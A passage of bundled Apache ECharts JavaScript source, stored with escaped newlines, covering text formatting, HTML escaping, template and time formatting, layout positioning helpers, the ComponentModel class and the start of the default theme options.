MAX_SAFE_INTEGER,\n\tremRadian: remRadian,\n\tisRadianAroundZero: isRadianAroundZero,\n\tparseDate: parseDate,\n\tquantity: quantity,\n\tquantityExponent: quantityExponent,\n\tnice: nice,\n\tquantile: quantile,\n\treformIntervals: reformIntervals,\n\tisNumeric: isNumeric\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// import Text from 'zrender/src/graphic/Text';\n\n/**\n * 每三位默认加,格式化\n * @param {string|number} x\n * @return {string}\n */\nfunction addCommas(x) {\n    if (isNaN(x)) {\n        return '-';\n    }\n    x = (x + '').split('.');\n    return x[0].replace(/(\\d{1,3})(?=(?:\\d{3})+(?!\\d))/g, '$1,')\n            + (x.length > 1 ? ('.' + x[1]) : '');\n}\n\n/**\n * @param {string} str\n * @param {boolean} [upperCaseFirst=false]\n * @return {string} str\n */\nfunction toCamelCase(str, upperCaseFirst) {\n    str = (str || '').toLowerCase().replace(/-(.)/g, function (match, group1) {\n        return group1.toUpperCase();\n    });\n\n    if (upperCaseFirst && str) {\n        str = str.charAt(0).toUpperCase() + str.slice(1);\n    }\n\n    return str;\n}\n\nvar normalizeCssArray$1 = normalizeCssArray;\n\n\nvar replaceReg = /([&<>\"'])/g;\nvar replaceMap = {\n    '&': '&amp;',\n    '<': '&lt;',\n    '>': '&gt;',\n    '\"': '&quot;',\n    '\\'': '&#39;'\n};\n\nfunction encodeHTML(source) {\n    return source == null\n        ? ''\n        : (source + '').replace(replaceReg, function (str, c) {\n            return replaceMap[c];\n        });\n}\n\nvar TPL_VAR_ALIAS = ['a', 'b', 'c', 'd', 'e', 'f', 'g'];\n\nvar wrapVar = function (varName, seriesIdx) {\n    return '{' + varName + (seriesIdx == null ? '' : seriesIdx) + '}';\n};\n\n/**\n * Template formatter\n * @param {string} tpl\n * @param {Array.<Object>|Object} paramsList\n * @param {boolean} [encode=false]\n * @return {string}\n */\nfunction formatTpl(tpl, paramsList, encode) {\n    if (!isArray(paramsList)) {\n        paramsList = [paramsList];\n    }\n    var seriesLen = paramsList.length;\n    if (!seriesLen) {\n        return '';\n    }\n\n    var $vars = paramsList[0].$vars || [];\n    for (var i = 0; i < $vars.length; i++) {\n        var alias = TPL_VAR_ALIAS[i];\n        tpl = tpl.replace(wrapVar(alias), wrapVar(alias, 0));\n    }\n    for (var seriesIdx = 0; seriesIdx < seriesLen; seriesIdx++) {\n        for (var k = 0; k < $vars.length; k++) {\n            var val = paramsList[seriesIdx][$vars[k]];\n            tpl = tpl.replace(\n                wrapVar(TPL_VAR_ALIAS[k], seriesIdx),\n                encode ? encodeHTML(val) : val\n            );\n        }\n    }\n\n    return tpl;\n}\n\n/**\n * simple Template formatter\n *\n * @param {string} tpl\n * @param {Object} param\n * @param {boolean} [encode=false]\n * @return {string}\n */\nfunction formatTplSimple(tpl, param, encode) {\n    each$1(param, function (value, key) {\n        tpl = tpl.replace(\n            '{' + key + '}',\n            encode ? encodeHTML(value) : value\n        );\n    });\n    return tpl;\n}\n\n/**\n * @param {Object|string} [opt] If string, means color.\n * @param {string} [opt.color]\n * @param {string} [opt.extraCssText]\n * @param {string} [opt.type='item'] 'item' or 'subItem'\n * @param {string} [opt.renderMode='html'] render mode of tooltip, 'html' or 'richText'\n * @param {string} [opt.markerId='X'] id name for marker. If only one marker is in a rich text, this can be omitted.\n * @return {string}\n */\nfunction getTooltipMarker(opt, extraCssText) {\n    opt = isString(opt) ? {color: opt, extraCssText: extraCssText} : (opt || {});\n    var color = opt.color;\n    var type = opt.type;\n    var extraCssText = opt.extraCssText;\n    var renderMode = opt.renderMode || 'html';\n    var markerId = opt.markerId || 'X';\n\n    if (!color) {\n        return '';\n    }\n\n    if (renderMode === 'html') {\n        return type === 'subItem'\n        ? '<span style=\"display:inline-block;vertical-align:middle;margin-right:8px;margin-left:3px;'\n            + 'border-radius:4px;width:4px;height:4px;background-color:'\n            + encodeHTML(color) + ';' + (extraCssText || '') + '\"></span>'\n        : '<span style=\"display:inline-block;margin-right:5px;'\n            + 'border-radius:10px;width:10px;height:10px;background-color:'\n            + encodeHTML(color) + ';' + (extraCssText || '') + '\"></span>';\n    }\n    else {\n        // Space for rich element marker\n        return {\n            renderMode: renderMode,\n            content: '{marker' + markerId + '|}  ',\n            style: {\n                color: color\n            }\n        };\n    }\n}\n\nfunction pad(str, len) {\n    str += '';\n    return '0000'.substr(0, len - str.length) + str;\n}\n\n\n/**\n * ISO Date format\n * @param {string} tpl\n * @param {number} value\n * @param {boolean} [isUTC=false] Default in local time.\n *           see `module:echarts/scale/Time`\n *           and `module:echarts/util/number#parseDate`.\n * @inner\n */\nfunction formatTime(tpl, value, isUTC) {\n    if (tpl === 'week'\n        || tpl === 'month'\n        || tpl === 'quarter'\n        || tpl === 'half-year'\n        || tpl === 'year'\n    ) {\n        tpl = 'MM-dd\\nyyyy';\n    }\n\n    var date = parseDate(value);\n    var utc = isUTC ? 'UTC' : '';\n    var y = date['get' + utc + 'FullYear']();\n    var M = date['get' + utc + 'Month']() + 1;\n    var d = date['get' + utc + 'Date']();\n    var h = date['get' + utc + 'Hours']();\n    var m = date['get' + utc + 'Minutes']();\n    var s = date['get' + utc + 'Seconds']();\n    var S = date['get' + utc + 'Milliseconds']();\n\n    tpl = tpl.replace('MM', pad(M, 2))\n        .replace('M', M)\n        .replace('yyyy', y)\n        .replace('yy', y % 100)\n        .replace('dd', pad(d, 2))\n        .replace('d', d)\n        .replace('hh', pad(h, 2))\n        .replace('h', h)\n        .replace('mm', pad(m, 2))\n        .replace('m', m)\n        .replace('ss', pad(s, 2))\n        .replace('s', s)\n        .replace('SSS', pad(S, 3));\n\n    return tpl;\n}\n\n/**\n * Capital first\n * @param {string} str\n * @return {string}\n */\nfunction capitalFirst(str) {\n    return str ? str.charAt(0).toUpperCase() + str.substr(1) : str;\n}\n\nvar truncateText$1 = truncateText;\n\n/**\n * @public\n * @param {Object} opt\n * @param {string} opt.text\n * @param {string} opt.font\n * @param {string} [opt.textAlign='left']\n * @param {string} [opt.textVerticalAlign='top']\n * @param {Array.<number>} [opt.textPadding]\n * @param {number} [opt.textLineHeight]\n * @param {Object} [opt.rich]\n * @param {Object} [opt.truncate]\n * @return {Object} {x, y, width, height, lineHeight}\n */\nfunction getTextBoundingRect(opt) {\n    return getBoundingRect(\n        opt.text,\n        opt.font,\n        opt.textAlign,\n        opt.textVerticalAlign,\n        opt.textPadding,\n        opt.textLineHeight,\n        opt.rich,\n        opt.truncate\n    );\n}\n\n/**\n * @deprecated\n * the `textLineHeight` was added later.\n * For backward compatiblility, put it as the last parameter.\n * But deprecated this interface. Please use `getTextBoundingRect` instead.\n */\nfunction getTextRect(\n    text, font, textAlign, textVerticalAlign, textPadding, rich, truncate, textLineHeight\n) {\n    return getBoundingRect(\n        text, font, textAlign, textVerticalAlign, textPadding, textLineHeight, rich, truncate\n    );\n}\n\n\nvar format = (Object.freeze || Object)({\n\taddCommas: addCommas,\n\ttoCamelCase: toCamelCase,\n\tnormalizeCssArray: normalizeCssArray$1,\n\tencodeHTML: encodeHTML,\n\tformatTpl: formatTpl,\n\tformatTplSimple: formatTplSimple,\n\tgetTooltipMarker: getTooltipMarker,\n\tformatTime: formatTime,\n\tcapitalFirst: capitalFirst,\n\ttruncateText: truncateText$1,\n\tgetTextBoundingRect: getTextBoundingRect,\n\tgetTextRect: getTextRect\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Layout helpers for each component positioning\n\nvar each$3 = each$1;\n\n/**\n * @public\n */\nvar LOCATION_PARAMS = [\n    'left', 'right', 'top', 'bottom', 'width', 'height'\n];\n\n/**\n * @public\n */\nvar HV_NAMES = [\n    ['width', 'left', 'right'],\n    ['height', 'top', 'bottom']\n];\n\nfunction boxLayout(orient, group, gap, maxWidth, maxHeight) {\n    var x = 0;\n    var y = 0;\n\n    if (maxWidth == null) {\n        maxWidth = Infinity;\n    }\n    if (maxHeight == null) {\n        maxHeight = Infinity;\n    }\n    var currentLineMaxSize = 0;\n\n    group.eachChild(function (child, idx) {\n        var position = child.position;\n        var rect = child.getBoundingRect();\n        var nextChild = group.childAt(idx + 1);\n        var nextChildRect = nextChild && nextChild.getBoundingRect();\n        var nextX;\n        var nextY;\n\n        if (orient === 'horizontal') {\n            var moveX = rect.width + (nextChildRect ? (-nextChildRect.x + rect.x) : 0);\n            nextX = x + moveX;\n            // Wrap when width exceeds maxWidth or meet a `newline` group\n            // FIXME compare before adding gap?\n            if (nextX > maxWidth || child.newline) {\n                x = 0;\n                nextX = moveX;\n                y += currentLineMaxSize + gap;\n                currentLineMaxSize = rect.height;\n            }\n            else {\n                // FIXME: consider rect.y is not `0`?\n                currentLineMaxSize = Math.max(currentLineMaxSize, rect.height);\n            }\n        }\n        else {\n            var moveY = rect.height + (nextChildRect ? (-nextChildRect.y + rect.y) : 0);\n            nextY = y + moveY;\n            // Wrap when width exceeds maxHeight or meet a `newline` group\n            if (nextY > maxHeight || child.newline) {\n                x += currentLineMaxSize + gap;\n                y = 0;\n                nextY = moveY;\n                currentLineMaxSize = rect.width;\n            }\n            else {\n                currentLineMaxSize = Math.max(currentLineMaxSize, rect.width);\n            }\n        }\n\n        if (child.newline) {\n            return;\n        }\n\n        position[0] = x;\n        position[1] = y;\n\n        orient === 'horizontal'\n            ? (x = nextX + gap)\n            : (y = nextY + gap);\n    });\n}\n\n/**\n * VBox or HBox layouting\n * @param {string} orient\n * @param {module:zrender/container/Group} group\n * @param {number} gap\n * @param {number} [width=Infinity]\n * @param {number} [height=Infinity]\n */\nvar box = boxLayout;\n\n/**\n * VBox layouting\n * @param {module:zrender/container/Group} group\n * @param {number} gap\n * @param {number} [width=Infinity]\n * @param {number} [height=Infinity]\n */\nvar vbox = curry(boxLayout, 'vertical');\n\n/**\n * HBox layouting\n * @param {module:zrender/container/Group} group\n * @param {number} gap\n * @param {number} [width=Infinity]\n * @param {number} [height=Infinity]\n */\nvar hbox = curry(boxLayout, 'horizontal');\n\n/**\n * If x or x2 is not specified or 'center' 'left' 'right',\n * the width would be as long as possible.\n * If y or y2 is not specified or 'middle' 'top' 'bottom',\n * the height would be as long as possible.\n *\n * @param {Object} positionInfo\n * @param {number|string} [positionInfo.x]\n * @param {number|string} [positionInfo.y]\n * @param {number|string} [positionInfo.x2]\n * @param {number|string} [positionInfo.y2]\n * @param {Object} containerRect {width, height}\n * @param {string|number} margin\n * @return {Object} {width, height}\n */\nfunction getAvailableSize(positionInfo, containerRect, margin) {\n    var containerWidth = containerRect.width;\n    var containerHeight = containerRect.height;\n\n    var x = parsePercent$1(positionInfo.x, containerWidth);\n    var y = parsePercent$1(positionInfo.y, containerHeight);\n    var x2 = parsePercent$1(positionInfo.x2, containerWidth);\n    var y2 = parsePercent$1(positionInfo.y2, containerHeight);\n\n    (isNaN(x) || isNaN(parseFloat(positionInfo.x))) && (x = 0);\n    (isNaN(x2) || isNaN(parseFloat(positionInfo.x2))) && (x2 = containerWidth);\n    (isNaN(y) || isNaN(parseFloat(positionInfo.y))) && (y = 0);\n    (isNaN(y2) || isNaN(parseFloat(positionInfo.y2))) && (y2 = containerHeight);\n\n    margin = normalizeCssArray$1(margin || 0);\n\n    return {\n        width: Math.max(x2 - x - margin[1] - margin[3], 0),\n        height: Math.max(y2 - y - margin[0] - margin[2], 0)\n    };\n}\n\n/**\n * Parse position info.\n *\n * @param {Object} positionInfo\n * @param {number|string} [positionInfo.left]\n * @param {number|string} [positionInfo.top]\n * @param {number|string} [positionInfo.right]\n * @param {number|string} [positionInfo.bottom]\n * @param {number|string} [positionInfo.width]\n * @param {number|string} [positionInfo.height]\n * @param {number|string} [positionInfo.aspect] Aspect is width / height\n * @param {Object} containerRect\n * @param {string|number} [margin]\n *\n * @return {module:zrender/core/BoundingRect}\n */\nfunction getLayoutRect(\n    positionInfo, containerRect, margin\n) {\n    margin = normalizeCssArray$1(margin || 0);\n\n    var containerWidth = containerRect.width;\n    var containerHeight = containerRect.height;\n\n    var left = parsePercent$1(positionInfo.left, containerWidth);\n    var top = parsePercent$1(positionInfo.top, containerHeight);\n    var right = parsePercent$1(positionInfo.right, containerWidth);\n    var bottom = parsePercent$1(positionInfo.bottom, containerHeight);\n    var width = parsePercent$1(positionInfo.width, containerWidth);\n    var height = parsePercent$1(positionInfo.height, containerHeight);\n\n    var verticalMargin = margin[2] + margin[0];\n    var horizontalMargin = margin[1] + margin[3];\n    var aspect = positionInfo.aspect;\n\n    // If width is not specified, calculate width from left and right\n    if (isNaN(width)) {\n        width = containerWidth - right - horizontalMargin - left;\n    }\n    if (isNaN(height)) {\n        height = containerHeight - bottom - verticalMargin - top;\n    }\n\n    if (aspect != null) {\n        // If width and height are not given\n        // 1. Graph should not exceeds the container\n        // 2. Aspect must be keeped\n        // 3. Graph should take the space as more as possible\n        // FIXME\n        // Margin is not considered, because there is no case that both\n        // using margin and aspect so far.\n        if (isNaN(width) && isNaN(height)) {\n            if (aspect > containerWidth / containerHeight) {\n                width = containerWidth * 0.8;\n            }\n            else {\n                height = containerHeight * 0.8;\n            }\n        }\n\n        // Calculate width or height with given aspect\n        if (isNaN(width)) {\n            width = aspect * height;\n        }\n        if (isNaN(height)) {\n            height = width / aspect;\n        }\n    }\n\n    // If left is not specified, calculate left from right and width\n    if (isNaN(left)) {\n        left = containerWidth - right - width - horizontalMargin;\n    }\n    if (isNaN(top)) {\n        top = containerHeight - bottom - height - verticalMargin;\n    }\n\n    // Align left and top\n    switch (positionInfo.left || positionInfo.right) {\n        case 'center':\n            left = containerWidth / 2 - width / 2 - margin[3];\n            break;\n        case 'right':\n            left = containerWidth - width - horizontalMargin;\n            break;\n    }\n    switch (positionInfo.top || positionInfo.bottom) {\n        case 'middle':\n        case 'center':\n            top = containerHeight / 2 - height / 2 - margin[0];\n            break;\n        case 'bottom':\n            top = containerHeight - height - verticalMargin;\n            break;\n    }\n    // If something is wrong and left, top, width, height are calculated as NaN\n    left = left || 0;\n    top = top || 0;\n    if (isNaN(width)) {\n        // Width may be NaN if only one value is given except width\n        width = containerWidth - horizontalMargin - left - (right || 0);\n    }\n    if (isNaN(height)) {\n        // Height may be NaN if only one value is given except height\n        height = containerHeight - verticalMargin - top - (bottom || 0);\n    }\n\n    var rect = new BoundingRect(left + margin[3], top + margin[0], width, height);\n    rect.margin = margin;\n    return rect;\n}\n\n\n/**\n * Position a zr element in viewport\n *  Group position is specified by either\n *  {left, top}, {right, bottom}\n *  If all properties exists, right and bottom will be igonred.\n *\n * Logic:\n *     1. Scale (against origin point in parent coord)\n *     2. Rotate (against origin point in parent coord)\n *     3. Traslate (with el.position by this method)\n * So this method only fixes the last step 'Traslate', which does not affect\n * scaling and rotating.\n *\n * If be called repeatly with the same input el, the same result will be gotten.\n *\n * @param {module:zrender/Element} el Should have `getBoundingRect` method.\n * @param {Object} positionInfo\n * @param {number|string} [positionInfo.left]\n * @param {number|string} [positionInfo.top]\n * @param {number|string} [positionInfo.right]\n * @param {number|string} [positionInfo.bottom]\n * @param {number|string} [positionInfo.width] Only for opt.boundingModel: 'raw'\n * @param {number|string} [positionInfo.height] Only for opt.boundingModel: 'raw'\n * @param {Object} containerRect\n * @param {string|number} margin\n * @param {Object} [opt]\n * @param {Array.<number>} [opt.hv=[1,1]] Only horizontal or only vertical.\n * @param {Array.<number>} [opt.boundingMode='all']\n *        Specify how to calculate boundingRect when locating.\n *        'all': Position the boundingRect that is transformed and uioned\n *               both itself and its descendants.\n *               This mode simplies confine the elements in the bounding\n *               of their container (e.g., using 'right: 0').\n *        'raw': Position the boundingRect that is not transformed and only itself.\n *               This mode is useful when you want a element can overflow its\n *               container. (Consider a rotated circle needs to be located in a corner.)\n *               In this mode positionInfo.width/height can only be number.\n */\nfunction positionElement(el, positionInfo, containerRect, margin, opt) {\n    var h = !opt || !opt.hv || opt.hv[0];\n    var v = !opt || !opt.hv || opt.hv[1];\n    var boundingMode = opt && opt.boundingMode || 'all';\n\n    if (!h && !v) {\n        return;\n    }\n\n    var rect;\n    if (boundingMode === 'raw') {\n        rect = el.type === 'group'\n            ? new BoundingRect(0, 0, +positionInfo.width || 0, +positionInfo.height || 0)\n            : el.getBoundingRect();\n    }\n    else {\n        rect = el.getBoundingRect();\n        if (el.needLocalTransform()) {\n            var transform = el.getLocalTransform();\n            // Notice: raw rect may be inner object of el,\n            // which should not be modified.\n            rect = rect.clone();\n            rect.applyTransform(transform);\n        }\n    }\n\n    // The real width and height can not be specified but calculated by the given el.\n    positionInfo = getLayoutRect(\n        defaults(\n            {width: rect.width, height: rect.height},\n            positionInfo\n        ),\n        containerRect,\n        margin\n    );\n\n    // Because 'tranlate' is the last step in transform\n    // (see zrender/core/Transformable#getLocalTransform),\n    // we can just only modify el.position to get final result.\n    var elPos = el.position;\n    var dx = h ? positionInfo.x - rect.x : 0;\n    var dy = v ? positionInfo.y - rect.y : 0;\n\n    el.attr('position', boundingMode === 'raw' ? [dx, dy] : [elPos[0] + dx, elPos[1] + dy]);\n}\n\n/**\n * @param {Object} option Contains some of the properties in HV_NAMES.\n * @param {number} hvIdx 0: horizontal; 1: vertical.\n */\nfunction sizeCalculable(option, hvIdx) {\n    return option[HV_NAMES[hvIdx][0]] != null\n        || (option[HV_NAMES[hvIdx][1]] != null && option[HV_NAMES[hvIdx][2]] != null);\n}\n\n/**\n * Consider Case:\n * When defulat option has {left: 0, width: 100}, and we set {right: 0}\n * through setOption or media query, using normal zrUtil.merge will cause\n * {right: 0} does not take effect.\n *\n * @example\n * ComponentModel.extend({\n *     init: function () {\n *         ...\n *         var inputPositionParams = layout.getLayoutParams(option);\n *         this.mergeOption(inputPositionParams);\n *     },\n *     mergeOption: function (newOption) {\n *         newOption && zrUtil.merge(thisOption, newOption, true);\n *         layout.mergeLayoutParam(thisOption, newOption);\n *     }\n * });\n *\n * @param {Object} targetOption\n * @param {Object} newOption\n * @param {Object|string} [opt]\n * @param {boolean|Array.<boolean>} [opt.ignoreSize=false] Used for the components\n *  that width (or height) should not be calculated by left and right (or top and bottom).\n */\nfunction mergeLayoutParam(targetOption, newOption, opt) {\n    !isObject$1(opt) && (opt = {});\n\n    var ignoreSize = opt.ignoreSize;\n    !isArray(ignoreSize) && (ignoreSize = [ignoreSize, ignoreSize]);\n\n    var hResult = merge$$1(HV_NAMES[0], 0);\n    var vResult = merge$$1(HV_NAMES[1], 1);\n\n    copy(HV_NAMES[0], targetOption, hResult);\n    copy(HV_NAMES[1], targetOption, vResult);\n\n    function merge$$1(names, hvIdx) {\n        var newParams = {};\n        var newValueCount = 0;\n        var merged = {};\n        var mergedValueCount = 0;\n        var enoughParamNumber = 2;\n\n        each$3(names, function (name) {\n            merged[name] = targetOption[name];\n        });\n        each$3(names, function (name) {\n            // Consider case: newOption.width is null, which is\n            // set by user for removing width setting.\n            hasProp(newOption, name) && (newParams[name] = merged[name] = newOption[name]);\n            hasValue(newParams, name) && newValueCount++;\n            hasValue(merged, name) && mergedValueCount++;\n        });\n\n        if (ignoreSize[hvIdx]) {\n            // Only one of left/right is premitted to exist.\n            if (hasValue(newOption, names[1])) {\n                merged[names[2]] = null;\n            }\n            else if (hasValue(newOption, names[2])) {\n                merged[names[1]] = null;\n            }\n            return merged;\n        }\n\n        // Case: newOption: {width: ..., right: ...},\n        // or targetOption: {right: ...} and newOption: {width: ...},\n        // There is no conflict when merged only has params count\n        // little than enoughParamNumber.\n        if (mergedValueCount === enoughParamNumber || !newValueCount) {\n            return merged;\n        }\n        // Case: newOption: {width: ..., right: ...},\n        // Than we can make sure user only want those two, and ignore\n        // all origin params in targetOption.\n        else if (newValueCount >= enoughParamNumber) {\n            return newParams;\n        }\n        else {\n            // Chose another param from targetOption by priority.\n            for (var i = 0; i < names.length; i++) {\n                var name = names[i];\n                if (!hasProp(newParams, name) && hasProp(targetOption, name)) {\n                    newParams[name] = targetOption[name];\n                    break;\n                }\n            }\n            return newParams;\n        }\n    }\n\n    function hasProp(obj, name) {\n        return obj.hasOwnProperty(name);\n    }\n\n    function hasValue(obj, name) {\n        return obj[name] != null && obj[name] !== 'auto';\n    }\n\n    function copy(names, target, source) {\n        each$3(names, function (name) {\n            target[name] = source[name];\n        });\n    }\n}\n\n/**\n * Retrieve 'left', 'right', 'top', 'bottom', 'width', 'height' from object.\n * @param {Object} source\n * @return {Object} Result contains those props.\n */\nfunction getLayoutParams(source) {\n    return copyLayoutParams({}, source);\n}\n\n/**\n * Retrieve 'left', 'right', 'top', 'bottom', 'width', 'height' from object.\n * @param {Object} source\n * @return {Object} Result contains those props.\n */\nfunction copyLayoutParams(target, source) {\n    source && target && each$3(LOCATION_PARAMS, function (name) {\n        source.hasOwnProperty(name) && (target[name] = source[name]);\n    });\n    return target;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar boxLayoutMixin = {\n    getBoxLayoutParams: function () {\n        return {\n            left: this.get('left'),\n            top: this.get('top'),\n            right: this.get('right'),\n            bottom: this.get('bottom'),\n            width: this.get('width'),\n            height: this.get('height')\n        };\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Component model\n *\n * @module echarts/model/Component\n */\n\nvar inner$1 = makeInner();\n\n/**\n * @alias module:echarts/model/Component\n * @constructor\n * @param {Object} option\n * @param {module:echarts/model/Model} parentModel\n * @param {module:echarts/model/Model} ecModel\n */\nvar ComponentModel = Model.extend({\n\n    type: 'component',\n\n    /**\n     * @readOnly\n     * @type {string}\n     */\n    id: '',\n\n    /**\n     * Because simplified concept is probably better, series.name (or component.name)\n     * has been having too many resposibilities:\n     * (1) Generating id (which requires name in option should not be modified).\n     * (2) As an index to mapping series when merging option or calling API (a name\n     * can refer to more then one components, which is convinient is some case).\n     * (3) Display.\n     * @readOnly\n     */\n    name: '',\n\n    /**\n     * @readOnly\n     * @type {string}\n     */\n    mainType: '',\n\n    /**\n     * @readOnly\n     * @type {string}\n     */\n    subType: '',\n\n    /**\n     * @readOnly\n     * @type {number}\n     */\n    componentIndex: 0,\n\n    /**\n     * @type {Object}\n     * @protected\n     */\n    defaultOption: null,\n\n    /**\n     * @type {module:echarts/model/Global}\n     * @readOnly\n     */\n    ecModel: null,\n\n    /**\n     * key: componentType\n     * value:  Component model list, can not be null.\n     * @type {Object.<string, Array.<module:echarts/model/Model>>}\n     * @readOnly\n     */\n    dependentModels: [],\n\n    /**\n     * @type {string}\n     * @readOnly\n     */\n    uid: null,\n\n    /**\n     * Support merge layout params.\n     * Only support 'box' now (left/right/top/bottom/width/height).\n     * @type {string|Object} Object can be {ignoreSize: true}\n     * @readOnly\n     */\n    layoutMode: null,\n\n    $constructor: function (option, parentModel, ecModel, extraOpt) {\n        Model.call(this, option, parentModel, ecModel, extraOpt);\n\n        this.uid = getUID('ec_cpt_model');\n    },\n\n    init: function (option, parentModel, ecModel, extraOpt) {\n        this.mergeDefaultAndTheme(option, ecModel);\n    },\n\n    mergeDefaultAndTheme: function (option, ecModel) {\n        var layoutMode = this.layoutMode;\n        var inputPositionParams = layoutMode\n            ? getLayoutParams(option) : {};\n\n        var themeModel = ecModel.getTheme();\n        merge(option, themeModel.get(this.mainType));\n        merge(option, this.getDefaultOption());\n\n        if (layoutMode) {\n            mergeLayoutParam(option, inputPositionParams, layoutMode);\n        }\n    },\n\n    mergeOption: function (option, extraOpt) {\n        merge(this.option, option, true);\n\n        var layoutMode = this.layoutMode;\n        if (layoutMode) {\n            mergeLayoutParam(this.option, option, layoutMode);\n        }\n    },\n\n    // Hooker after init or mergeOption\n    optionUpdated: function (newCptOption, isInit) {},\n\n    getDefaultOption: function () {\n        var fields = inner$1(this);\n        if (!fields.defaultOption) {\n            var optList = [];\n            var Class = this.constructor;\n            while (Class) {\n                var opt = Class.prototype.defaultOption;\n                opt && optList.push(opt);\n                Class = Class.superClass;\n            }\n\n            var defaultOption = {};\n            for (var i = optList.length - 1; i >= 0; i--) {\n                defaultOption = merge(defaultOption, optList[i], true);\n            }\n            fields.defaultOption = defaultOption;\n        }\n        return fields.defaultOption;\n    },\n\n    getReferringComponents: function (mainType) {\n        return this.ecModel.queryComponents({\n            mainType: mainType,\n            index: this.get(mainType + 'Index', true),\n            id: this.get(mainType + 'Id', true)\n        });\n    }\n\n});\n\n// Reset ComponentModel.extend, add preConstruct.\n// clazzUtil.enableClassExtend(\n//     ComponentModel,\n//     function (option, parentModel, ecModel, extraOpt) {\n//         // Set dependentModels, componentIndex, name, id, mainType, subType.\n//         zrUtil.extend(this, extraOpt);\n\n//         this.uid = componentUtil.getUID('componentModel');\n\n//         // this.setReadOnly([\n//         //     'type', 'id', 'uid', 'name', 'mainType', 'subType',\n//         //     'dependentModels', 'componentIndex'\n//         // ]);\n//     }\n// );\n\n// Add capability of registerClass, getClass, hasClass, registerSubTypeDefaulter and so on.\nenableClassManagement(\n    ComponentModel, {registerWhenExtend: true}\n);\nenableSubTypeDefaulter(ComponentModel);\n\n// Add capability of ComponentModel.topologicalTravel.\nenableTopologicalTravel(ComponentModel, getDependencies);\n\nfunction getDependencies(componentType) {\n    var deps = [];\n    each$1(ComponentModel.getClassesByMainType(componentType), function (Clazz) {\n        deps = deps.concat(Clazz.prototype.dependencies || []);\n    });\n\n    // Ensure main type.\n    deps = map(deps, function (type) {\n        return parseClassType$1(type).main;\n    });\n\n    // Hack dataset for convenience.\n    if (componentType !== 'dataset' && indexOf(deps, 'dataset') <= 0) {\n        deps.unshift('dataset');\n    }\n\n    return deps;\n}\n\nmixin(ComponentModel, boxLayoutMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar platform = '';\n// Navigator not exists in node\nif (typeof navigator !== 'undefined') {\n    platform = navigator.platform || '';\n}\n\nvar globalDefault = {\n    // backgroundColor: 'rgba(0,0,0,0)',\n\n    // https://dribbble.com/shots/1065960-Infographic-Pie-chart-visualization\n    // color: ['#5793f3', '#d14a61', '#fd9c35', '#675bba', '#fec42c', '#dd4444', '#d4df5a', '#cd4870'],\n    // Light colors:\n    // color: ['#bcd3bb', '#e88f70', '#edc1a5', '#9dc5c8', '#e1e8c8', '#7b7c68', '#e5b5b5', '#f0b489', '#928ea8', '#bda29a'],\n    // color: ['#cc5664', '#9bd6ec', '#ea946e', '#8acaaa', '#f1ec64', '#ee8686', '#a48dc1', '#5da6bc', '#b9dcae'],\n    // Dark colors:\n    color: [\n        '#c23531', '#2f4554', '#61a0a8', '#d48265', '#91c7ae', '#749f83',\n        '#ca8622', '#bda29a', '#6e7074', '#546570', '#c4ccd3'\n    ],\n\n    gradientColor: ['#f6efa6', '#d88273', '#bf444c'],\n\n    // If xAxis and yAxis declared, grid is created by default.\n    // grid: {},\n\n    textStyle: {\n        // color: '#000',\n        // decoration: 'none',\n        // PENDING\n        fontFamily: platform.match(/^Win/) ? 'Microsoft YaHei' : 'sans-serif',\n        // fontFamily: 'Arial, Verdana, sans-serif',\n        fontSize: 12,\n        fontStyle: 'normal',\n        fontWeight: 'normal'\n    },\n\n    // 